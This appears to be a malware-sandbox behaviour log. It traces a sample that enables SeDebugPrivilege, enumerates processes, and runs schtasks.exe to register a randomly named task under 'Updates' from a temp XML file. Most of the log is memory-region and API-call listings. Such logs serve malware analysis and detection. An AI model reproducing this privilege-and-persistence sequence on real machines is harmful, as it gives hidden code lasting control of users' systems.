[0197.205] GetLastError () returned 0x2
[0197.211] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.211] GetLastError () returned 0x2
[0197.212] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.212] GetLastError () returned 0x2
[0197.233] DestroyCursor (hCursor=0x700fb) returned 1
[0197.237] CloseHandle (hObject=0x4d0) returned 1
[0197.237] GetLastError () returned 0x2
[0197.239] CloseHandle (hObject=0x384) returned 1
[0197.239] GetLastError () returned 0x2
[0197.239] CloseHandle (hObject=0x354) returned 1
[0197.239] GetLastError () returned 0x2
[0197.239] CloseHandle (hObject=0x380) returned 1
[0197.240] GetLastError () returned 0x2
[0197.240] _DllBidEntryPoint@36 () returned 0x1
[0197.240] _DllBidFinalize@0 () returned 0x0
[0197.240] RegCloseKey (hKey=0x80000004) returned 0x0
[0197.241] UnmapViewOfFile (lpBaseAddress=0x73b0000) returned 1
[0197.241] GetLastError () returned 0x2
[0197.242] CloseHandle (hObject=0x358) returned 1
[0197.242] GetLastError () returned 0x2
Thread:
id = 5
os_tid = 0x990
Thread:
id = 6
os_tid = 0x890
Thread:
id = 7
os_tid = 0xa3c
Thread:
id = 8
os_tid = 0xa28
Thread:
id = 9
os_tid = 0xed8
[0124.683] CoGetContextToken (in: pToken=0x77efde8 | out: pToken=0x77efde8) returned 0x0
[0124.684] IUnknown:QueryInterface (in: This=0x6fbbf8, riid=0x6c074a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x77efe1c | out: ppvObject=0x77efe1c*=0x6fbc04) returned 0x0
[0124.685] IComThreadingInfo:GetCurrentThreadType (in: This=0x6fbc04, pThreadType=0x77efe50 | out: pThreadType=0x77efe50*=0) returned 0x0
[0124.685] IUnknown:Release (This=0x6fbc04) returned 0x0
[0124.685] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 10
os_tid = 0x1370
Thread:
id = 11
os_tid = 0x1290
Thread:
id = 12
os_tid = 0x12d0
Thread:
id = 107
os_tid = 0x9f4
[0196.291] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0196.321] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x957eff4 | out: lpLuid=0x957eff4*(LowPart=0x14, HighPart=0)) returned 1
[0196.323] GetLastError () returned 0x0
[0196.323] GetCurrentProcess () returned 0xffffffff
[0196.325] GetLastError () returned 0x0
[0196.328] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x957eff0 | out: TokenHandle=0x957eff0*=0x4e4) returned 1
[0196.328] GetLastError () returned 0x0
[0196.330] AdjustTokenPrivileges (in: TokenHandle=0x4e4, DisableAllPrivileges=0, NewState=0x279eff4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0196.331] GetLastError () returned 0x0
[0196.410] CloseHandle (hObject=0x4e4) returned 1
[0196.410] GetLastError () returned 0x0
[0196.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3caad20, Length=0x20000, ResultLength=0x957f7a0 | out: SystemInformation=0x3caad20, ResultLength=0x957f7a0*=0x17850) returned 0x0
[0197.251] CoGetContextToken (in: pToken=0x957f2f0 | out: pToken=0x957f2f0) returned 0x0
[0197.252] IUnknown:QueryInterface (in: This=0x6fbbf8, riid=0x6c074a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x957f324 | out: ppvObject=0x957f324*=0x6fbc04) returned 0x0
[0197.252] IComThreadingInfo:GetCurrentThreadType (in: This=0x6fbc04, pThreadType=0x957f358 | out: pThreadType=0x957f358*=0) returned 0x0
[0197.252] IUnknown:Release (This=0x6fbc04) returned 0x0
Thread:
id = 108
os_tid = 0x288
Process:
id = "2"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x51e3e000"
os_pid = "0x12c8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xaf0"
cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\xErAccEJcQLD\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 940
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 941
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 942
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 943
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 944
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 945
start_va = 0xe0000
end_va = 0xe3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 946
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 947
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 948
start_va = 0x3a0000
end_va = 0x3d1fff
monitored = 1
entry_point = 0x3c05b0
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 949
start_va = 0x3e0000
end_va = 0x43dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 950
start_va = 0x4400000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 951
start_va = 0x77260000
end_va = 0x773dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 952
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 953
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 954
start_va = 0x7fff0000
end_va = 0x7dfc5f80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 955
start_va = 0x7dfc5f810000
end_va = 0x7ffc5f80ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007dfc5f810000"
filename = ""
Region:
id = 956
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 957
start_va = 0x7ffc5f9d1000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffc5f9d1000"
filename = ""
Region:
id = 958
start_va = 0x2b0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 959
start_va = 0x62ee0000
end_va = 0x62f2ffff
monitored = 0
entry_point = 0x62ef8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 960
start_va = 0x62f30000
end_va = 0x62fa9fff
monitored = 0
entry_point = 0x62f43290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 961
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 962
start_va = 0x62fb0000
end_va = 0x62fb7fff
monitored = 0
entry_point = 0x62fb17c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 963
start_va = 0x4600000
end_va = 0x486ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 964
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 965
start_va = 0x76c20000
end_va = 0x76d9dfff
monitored = 0
entry_point = 0x76cd1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 966
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 967
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 1050
start_va = 0x110000
end_va = 0x1cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1051
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1052
start_va = 0x74290000
end_va = 0x7434dfff
monitored = 0
entry_point = 0x742c5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1053
start_va = 0x1d0000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1054
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1055
start_va = 0x743f0000
end_va = 0x74481fff
monitored = 0
entry_point = 0x74428cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1056
start_va = 0x76da0000
end_va = 0x76f5cfff
monitored = 0
entry_point = 0x76e82a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1057
start_va = 0x75f60000
end_va = 0x7600cfff
monitored = 0
entry_point = 0x75f74f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1058
start_va = 0x73f90000
end_va = 0x73fadfff
monitored = 0
entry_point = 0x73f9b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1059
start_va = 0x73f80000
end_va = 0x73f89fff
monitored = 0
entry_point = 0x73f82a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1060
start_va = 0x75ef0000
end_va = 0x75f47fff
monitored = 0
entry_point = 0x75f325c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1061
start_va = 0x74a40000
end_va = 0x74a83fff
monitored = 0
entry_point = 0x74a59d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1062
start_va = 0x4870000
end_va = 0x4a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004870000"
filename = ""
Region:
id = 1063
start_va = 0x4600000
end_va = 0x46e9fff
monitored = 0
entry_point = 0x463d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1064
start_va = 0x4770000
end_va = 0x486ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004770000"
filename = ""
Region:
id = 1065
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1066
start_va = 0x250000
end_va = 0x250fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 1067
start_va = 0x4a40000
end_va = 0x4e3afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004a40000"
filename = ""
Region:
id = 1068
start_va = 0x4e40000
end_va = 0x5176fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1069
start_va = 0x74350000
end_va = 0x7435bfff
monitored = 0
entry_point = 0x74353930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1070
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 1071
start_va = 0x74360000
end_va = 0x743e3fff
monitored = 0
entry_point = 0x74386220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1072
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 1073
start_va = 0x6a520000
end_va = 0x6a5abfff
monitored = 0
entry_point = 0x6a55a6c0
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 13
os_tid = 0x1c4
[0193.527] GetModuleHandleA (lpModuleName=0x0) returned 0x3a0000
[0193.527] __set_app_type (_Type=0x1)
[0193.527] __p__fmode () returned 0x74344d6c
[0193.527] __p__commode () returned 0x74345b1c
[0193.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3c0840) returned 0x0
[0193.528] __wgetmainargs (in: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8, _DoWildCard=0, _StartInfo=0x3cadf4 | out: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8) returned 0
[0193.528] _onexit (_Func=0x3c2bc0) returned 0x3c2bc0
[0193.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0193.529] WinSqmIsOptedIn () returned 0x0
[0193.529] GetProcessHeap () returned 0x4770000
[0193.529] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777498
[0193.529] RtlRestoreLastWin32Error () returned 0x0
[0193.529] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0193.529] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0193.529] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0193.530] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777378
[0193.530] lstrlenW (lpString="") returned 0
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x2) returned 0x4770598
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776e48
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47774e0
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776c10
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776c30
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776c50
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776840
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47773d8
[0193.530] GetProcessHeap () returned 0x4770000
[0193.530] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776860
[0193.530] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776880
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47765d8
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47765f8
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777390
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4776618
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4772780
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47727a0
[0193.531] GetProcessHeap () returned 0x4770000
[0193.531] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47727c0
[0193.531] SetThreadUILanguage (LangId=0x0) returned 0x409
[0193.538] RtlRestoreLastWin32Error () returned 0x0
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793c8
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779468
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779428
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794e8
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779588
[0193.538] GetProcessHeap () returned 0x4770000
[0193.538] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777438
[0193.538] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.539] GetProcessHeap () returned 0x4770000
[0193.539] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x208) returned 0x4778ce0
[0193.539] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4778ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0193.539] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c
[0193.541] GetProcessHeap () returned 0x4770000
[0193.541] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x776) returned 0x4779db8
[0193.541] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4779db8 | out: lpData=0x4779db8) returned 1
[0193.542] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x477a168, puLen=0xdfb10) returned 1
[0193.544] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.544] _vsnwprintf (in: _Buffer=0x4778ce0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0193.545] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x4779f98, puLen=0xdfb18) returned 1
[0193.545] lstrlenW (lpString="schtasks.exe") returned 12
[0193.545] lstrlenW (lpString="schtasks.exe") returned 12
[0193.545] lstrlenW (lpString=".EXE") returned 4
[0193.545] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0193.546] lstrlenW (lpString="schtasks.exe") returned 12
[0193.546] lstrlenW (lpString=".EXE") returned 4
[0193.546] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.546] lstrlenW (lpString="schtasks") returned 8
[0193.546] GetProcessHeap () returned 0x4770000
[0193.546] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779608
[0193.546] GetProcessHeap () returned 0x4770000
[0193.546] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779688
[0193.546] GetProcessHeap () returned 0x4770000
[0193.546] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793e8
[0193.546] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47793a8
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777480
[0193.547] _memicmp (_Buf1=0x4777480, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa0) returned 0x47769e0
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779548
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779528
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795a8
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777468
[0193.547] _memicmp (_Buf1=0x4777468, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.547] GetProcessHeap () returned 0x4770000
[0193.547] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x200) returned 0x477a798
[0193.547] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x477a798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0193.548] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x30) returned 0x4776a88
[0193.548] _vsnwprintf (in: _Buffer=0x47769e0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779db8) returned 1
[0193.548] GetProcessHeap () returned 0x4770000
[0193.548] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779db8) returned 0x776
[0193.548] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779db8) returned 1
[0193.548] RtlRestoreLastWin32Error () returned 0x0
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.548] lstrlenW (lpString="?") returned 1
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.548] lstrlenW (lpString="create") returned 6
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.548] lstrlenW (lpString="delete") returned 6
[0193.548] GetThreadLocale () returned 0x409
[0193.548] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="query") returned 5
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="change") returned 6
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="run") returned 3
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="end") returned 3
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] lstrlenW (lpString="showsid") returned 7
[0193.549] GetThreadLocale () returned 0x409
[0193.549] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.549] RtlRestoreLastWin32Error () returned 0x0
[0193.549] RtlRestoreLastWin32Error () returned 0x0
[0193.549] lstrlenW (lpString="/Create") returned 7
[0193.549] lstrlenW (lpString="-/") returned 2
[0193.549] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.549] lstrlenW (lpString="?") returned 1
